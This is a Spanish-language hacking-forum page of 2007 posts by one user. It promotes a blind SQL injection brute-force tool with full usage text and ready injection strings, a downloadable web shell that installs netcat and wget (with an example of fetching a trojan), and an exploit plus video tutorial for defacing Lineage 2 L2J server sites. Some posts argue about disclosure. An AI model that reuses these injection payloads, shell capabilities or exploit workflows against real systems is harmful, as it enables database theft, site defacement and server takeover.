Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - codebreak

#1
Buenas,

Adjunto un enlace al video.
Sus opiniones aca.... lo siento si esta en ingles...

Video: http://codebreak.uni.cc/video/index.html

Consiste en un ataque basado en el reporte entregado por Jikto.
A partir de ahi, por medio de blindmap, aprovecharse de una inyección.



Saludos!!
#2
Nivel Web / BlindMap - Advanced SQL Injection
9 Junio 2007, 00:35 AM
Hola,

Esta es una pequeña aplicación que hice el otro día.
Consiste en un bruteforcer automatizado para inyecciones ciegas (blind).  La idea principal de esta utilidad es la posibilidad de construir inyecciones SQL a gusto (sean ciegas o no) y utilizando el poder de la fuerza bruta. Se que hay una gran cantidad de utilidades para poder realizar inyecciones, sin embargo, la gran mayoría (o las que yo he visto) poseen inyecciones predeterminadas para obtener información especifica y no te dan la libertad de poder crear tus propias inyecciones con procesos automatizados.

Con esta utilidad, podrás crear tus propias inyecciones utilizando un incremento de char(n) para poder obtener información valiosa, incluso pudiendo utilizar diccionarios para poder forzar el nombre de tablas, columnas, etc...

La aplicacion:

   ______ _ _           ____  ___           
   | ___ \ (_)         | |  \/  |           
   | |_/ / |_ _ __   __| | .  . | __ _ _ __ 
   | ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
   | |_/ / | | | | | (_| | |  | | (_| | |_) |
   \____/|_|_|_| |_|\__,_\_|  |_/\__,_| .__/
                                      | |   
                                      |_| Rev.4

~ [ www.codebreak.tk - codebreak1984@gmail.com] ~

   Blind SQL Mapper - For advanced SQL Injection

Works with all mysql versions. Just desing a valid query.


Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984@gmail.com

-----------------------------------------------------------------------------
Usage: sql.exe -type host path injection check
type:
-column      Will try to find valid columns using a wordlist.
-brute       Will try to bruteforce your query.
-table       Will bruteforce your query with a wordlist.
host:        target server (ip or hostname)
path:        vulnerable path, including script and variable
injection:   a valid mysql query.
-[+]          the incremental MID variable, in case of a true query.
-[char]       the incremental char numbers to compare the column data.
-[word]       You can test words from a wordlist. Nice to find tables.
check:       A string shown in a valid query

Examples:

sql.exe -brute "www.injectme.com" "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"

sql.exe -column "www.injectme.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

sql.exe -table "www.injectme.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

-----------------------------------------------------------------------------




Un ejemplo:
Supongamos que yo poseo un script con fallas y averiguo que existe una columna llamada "name", de modo que deseo obtener información dentro de dicha columna, asociada a mi consulta (id=404). Esta consulta debiese funcionar en MySQL 3.x

sql.exe -brute "localhost" "/system/search.php?search=404" "+AND+ASCII(MID(name,[+],1))=[char]" "404"

Donde:
- Host: localhost.
- Path (y consulta válida): "/system/search.php?search=404"
- Inyección: "+AND+ASCII(MID(name,[+],1))=[char]"
- columna: name
- Utilizando [+] y [char] para fuerza bruta. ("[+]" incrementa solo cuando se encuentra un "match" válido y "[char]" incrementa hasta un match válido).
- match: 404 (no es el ID, es un keyword en caso de resultado valido; 1=1).

* Ya se que lo que buscamos ya aparece en la web y la inyección es innecesaria, pero es para probar el concepto.

Lo anterior va a probar:
search.php?search=404+AND+ASCII(MID(name,1,1))=76
search.php?search=404+AND+ASCII(MID(name,1,1))=77  <--- MATCH VALIDO: 77 representa la letra M
search.php?search=404+AND+ASCII(MID(name,2,1))=32  <--- BUSCANDO SEGUNDA LETRA.
search.php?search=404+AND+ASCII(MID(name,2,1))=33
search.php?search=404+AND+ASCII(MID(name,2,1))=34
search.php?search=404+AND+ASCII(MID(name,2,1))=35


Resultado:



Otro ejemplo: mysql 3.x
Hagamos que conocemos otra inyección y ahora queremos conocer el nombre de la columna, utilizando esta consulta.

ORDER+BY+column--

De modo, que intentare esto:
sql.exe -column "www.somesite.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

Donde:
- Host: ww.somesite.com
- Path (y consulta válida): ""/news/news.php?id=1"
- Match (encontrar): "Ps3 released!"
- Wordlist: "wordlist.txt"

Esto intentara:

news.php?id=1+ORDER+BY+user-
news.php?id=1+ORDER+BY+users--
news.php?id=1+ORDER+BY+pass--
news.php?id=1+ORDER+BY+password--
news.php?id=1+ORDER+BY+passwords--

*Cuando se encuentre un resultado válido (1=1), la aplicación listara el nombre de la columna.
** Esta es la unica consulta sin modificacion, esta pre diseñada. (de modo que puede fallar en ciertas apps, debido al diseño)


Otro ejemplo!: mysql 4.x
Encontramos otra inyección y ahora podemos utilizar UNIONES en las consultas, de modo que intentare averiguar el nombre de las tablas.

Intentare esto:
sql.exe -table "www.somesite.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

Donde:
- Host: www.somesite.com
- Path & Inyección Valida (N° de columnas): "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]"
- Utilizando "[word]" como variable, donde estaran las palabras del diccionario.
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
* Cuando haya un resultado valido, la app nos dira la palabra valida.

Obviamente, estos son meramente ejemplos. Ustedes pueden diseñar sus propias consultas.
La idea principal de esta aplicación es poder tener una mano extra, que nos ayude cuando el proceso se vuelve tedioso y puede ser automatizado... porque como podran ver... no es una herramienta muy amigable y podriamos decir que es un poco avanzada.

Descarga:
http://rapidshare.com/files/30757746/sql.zip.html

Adios!
#3
Buenas,

He actualizado mi antigua shell (server explorer) por una algo mejor jaajaja.
Cree una shell desde cero e incluí la shell antigua (es decir, hay 2 interfaces de uso).

Lo nuevo:
- *Agregada la opcion de instalar Netcat.
- *Agregada la opcion de instalar wget.
- Incluye una simulación del comando "cat" de linux.
- Simulacion de shell (puedes navegar desde esta shell.. no solo ejecutar comandos, sino que explorar ya que recuerda los path).

* Las utilidades mencionadas, vienen incluidas en el código de la shell, de modo que no hay que descargarlas. Se instalan con un click.
Además, vienen codificadas en la base de la shell, de modo que si se instalan, la shell lo reconocera y habilitara los comandos "nc" y "wget" que estarán enganchados al sistema (se podrán ejecutar desde cualquier directorio, a lo linux). Es decir, puedes ingresar al disco "c:", luego a la carpeta "windows" y luego escribiendo "wger http://sitio.com/troyano.exe" podrás descargar un troyano directamente a ese directorio.



La shell:
http://rapidshare.com/files/24383052/cbreak.zip.html


Saludos,

PS: Ojala esta vez el personaje "MB" no me la plagie denuevo.
#4
Cita de: Bebbop en  7 Enero 2007, 23:29 PM
No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).



No me reía de como tiraban abajo servidores.
Me reía del hecho de que a la semana de publicar un exploit, ya había un video de un grupo hacker de holanda que hacia uso de mi exploit para tirar 7 servidores en 30 minutos.

Que es lo gracioso?, el ver servidores abajo?. NO... el ver un video sobre mi exploit siendo explicado en un idioma casi ilegible. En todo caso, me puse en contacto con ellos para darles mi opinión.. pero denuevo digo:  estas asumiendo cosas y comentando fundándote en ellas.

En ragezone, no fui yo quien coloco la advertencia sino un amigo que es admin de servidores y le dije que lo coloque en el lugar que estime sea mas conveniente. Si no lo ves en el foro oficial de l2j fue para no publicitarlo... fue todo por pm. Principalmente porque?, pq el exploit no va a la versión 0.01 publicada ahi (la que tu advertiste), sino a la versión modificada y unida con ACM.

Saludos,

PS: Por algo la versión publicada en elantro esta protegida con contraseña. Si mi intención fuese el daño, seria estúpido hacer eso.
#5
Cita de: Bebbop en  5 Enero 2007, 14:00 PM
Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo también sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????


Bueno, si colocan el código ahi me da lo mismo. La cosa es que el trabajo de buscarlo al menos no lo hago yo.

A ver.. Quien me sorprende eres tu.
Te has puesto TU en contacto CONMIGO para saber si avise sobre el bug?.. NO. Estas hablando SIN SABER.

Me puse en contacto con los creadores de los principales packs que incluyen el script (Hero1711, Panter, L2j Dev, etc...) antes de hacer publico el exploit... asi que todo lo que dices no tiene sentido.

Y te crees muy experto por poder decodificar el base64 del exploit???, ajajajaj. No creas que me vas a venir a  impresionar cuando lo único que haces, es decodificar y encontrar algo que yo hice ajaja. Están en base64 para mayor comodidad, no para ocultar algo... de hecho me impresionaría unicamente si no lo puedes decodificar.

Era tan fácil encontrar el exploit como buscar su nombre en google e ingresar a la primera pagina que aparece listada, pues el source lo publique en la comunidad W4cking y en ningun otro lado. Asi que no te des merito.

Saludos,

PS: Uno de los casos del plagio lo puedes ver aca... para que por un minuto entiendas y respetes la opinion de los demás de publicar o no información. Te repito.. yo me comunique con distintos admins y creadores asi que porfavor, para de hacer afirmaciones sin fundamentos. Incluso, el video mismo fue hecho para que los admins que no consideraban peligroso el exploit tomen conciencia.

Original:
http://usuarios.lycos.es/changoleoni/cbreak.txt
Plagio:
http://decadence.inc.md/%5B-%20PHP%20Shells/utool.html

Parecidos??.
El ultimo  se hizo famoso y el primero (el original) paso al recuerdo.

En todo caso.. cree 2 exploits mas, para los dos sripts mas usados.. y ellos no han sido publicados. Dependera de que sucede con este exploit.. sin embargo.. ya avise su error a muchos admins. Pero supongo tu ya sabes eso no?, que pareces saber tanto sobre mi y lo que hago como para poder venirme a  juzgar.
#6
Cita de: Conemrad en  4 Enero 2007, 21:53 PM
los exploits los detecta como virus

Creo que esa es una información un poco general.
No me extrañaría que un antivirus lo detecte como exploit o archivo malicioso, como sucede normalmente con cualquier herramienta similar.

Como virus?. Que virus?.
Por favor adjunta una captura del mensaje.

Saludos,
#7
Cita de: Critical Hit en  4 Enero 2007, 13:22 PM
Pues sin un código fuente por delante no pienso ejecutar eso en mi PC.

Buena suerte.

Soy usuario de este foro hace ya un par de años... y no seria capaz de enviarles un archivo infectado.

El exploit lo hice yo, lo subí yo y les digo que no tiene nada. De todos modos, si lo quieres ejecutar o no, me es indiferente.. puesto que puedes ver su funcionamiento en el video.. y este post es meramente para compartir información y posterior prevención, no para forzar su aplicacion.

Saludos,
#8
Cita de: Lympex en  2 Enero 2007, 03:05 AM
seguro k él no publicó "su" código ;)

Bueno en todo caso el video y el exploit los hice yo.
Y si, publique "mi" codigo.. pero en ninguno de los foros donde antes habia publicado los otros (este inclusive).. pues en aquellos.. me plagiaron.

Dentro de todo es "mi" codigo, aunque el exploit esta basado en otros.. la vulnerabilidad la encontre yo y el exploit fue mejorado para que sea mas completo que aquellos exploits "originales".

Saludos,  ;)

Atte
Chico AKA Codebreak
#9
Hacking / Hackeando webs de Lineage 2 - video
2 Enero 2007, 01:28 AM
Esop, es un video-tutorial que muestra como "hackear" o defacear webs de Lineage 2, que usen servidores L2J.

La gran mayoría de los servidores de Lineage 2 L2J, ya sean tanto caseros como de comunidades, utilizan el portal "L2J Statistik Script".  Es mas, todos los packs listos (con apache + mysql + server l2j) incluyen dicha web.. asi que no es raro encontrar este tipo de webs en servers L2J.

Acá se muestra la ejecución del exploit para este tipo de webs.

El exploit lo pueden descargar desde aca:
http://rapidshare.com/files/5656195/cb.zip.html
http://rapidshare.com/files/5656403/cb-diskw.zip.html
(Siento mucho que sean .exe, pero el codigo fuente no es "publico" aun. Esto debido a que las ultimas 2 utilidades que hice, alguien cambio los creditos y lo subio a su sitio y otros sitios de seguridad a su nombre)



Saludos, ::)
#10
Buenas, acá les dejo un link con ambos discos comprimidos en un solo zip.

Siento no haber respuesto estos mensajes antes, pero la verdad he estado corto de tiempo y a su vez se me habían perdido los discos. Recien hoy vi sus mensajes y me dedique a buscar los discos para poder pasarlos al PC nuevamente y así subirlos, debido a que muchos me han estado enviando mensajes privados pidiendo que se los mande ;).




PD: Si alguien puede alojarlos en algun servidor propio, de modo que sea mas estable la descarga, lo agradecería muchísimo.